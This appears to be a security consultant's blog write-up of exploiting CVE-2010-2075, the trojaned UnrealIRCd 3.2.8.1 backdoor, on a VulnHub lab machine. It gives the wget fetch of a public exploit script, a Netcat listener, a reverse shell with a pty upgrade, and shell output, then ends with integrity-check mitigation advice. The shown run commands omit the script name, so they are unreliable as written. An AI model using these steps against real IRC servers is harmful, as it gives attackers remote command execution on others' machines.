Avatar.

chancej715

Security Consultant

Introduction

In this post I will describe how to exploit CVE-2010-2075 to execute arbitrary commands on UnrealIRCd version 3.2.8.1.

Description

UnrealIRCd version 3.2.8.1 contains a trojan horse which allows remote attackers to execute arbitary commands. According to this full disclosure, the UnrealIRCd website and mirror FTP servers had been compromised, and a malicious attacker replaced the Unreal3.2.8.1.tar.gz file with a version containing a backdoor which allowed an attacker to execute arbitrary commands with the privileges of the user running the ircd.

Environment

To demonstrate the exploitation of this vulnerability, I will be using the SUNSET: NOONTIDE box by whitecr0wz on VulnHub, which is running an UnrealIRCd version 3.2.8.1 server. Setup the box and get an IP address.

Next, download a copy of the exploit to your local machine:

wget https://raw.githubusercontent.com/chancej715/UnrealIRCD-3.2.8.1-Backdoor-Command-Execution/main/script.py

Note that this exploit requires Python 3 to be installed.

Methodology

Before executing the script, you must setup a Netcat listener on your local machine:

nc -lp 4444

The script can be run against the target with the following syntax:

python3 script.py

After that, you may execute the script against the target machine:

python3 <target> <tport> <listen> <lport>
  • <target> IP address of target machine.
  • <tport> TCP port number that the UnrealIRCd server is listening to.
  • <listen> IP address of the host running the Netcat listener.
  • <lport> TCP port number that the Netcat listener is listening to.

In my case, I will run the following command:

python3 192.168.1.3 6697 192.168.1.2 4444

After a few seconds, I type ls in my Netcat listener, and I see some output:

ls
aliases
autoconf
badwords.channel.conf
badwords.message.conf
badwords.quit.conf
Changes
Changes.old
Config
config.guess
config.log
config.settings
...

At this point I can optionally upgrade this reverse shell to a fully interactive tty:

python3 -c "import pty;pty.spawn('/bin/bash')"

Results

I now have an interactive shell on the machine which I can execute arbitrary commands:

server@noontide:~/irc/Unreal3.2$ id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

In this case, I can execute commands as the user server. According to the full disclosure linked above, I can execute any command with the privileges of the user running the ircd, in this case the server user.

Mitigation

Be sure to use the latest version of UnrealIRCd. It’s best practice to confirm the integrity of downloaded software. This can be done using PGP (GPG) or by manually calculating the hash of the downloaded file(s) on your local machine, and comparing them with the hash on the maintainer’s website.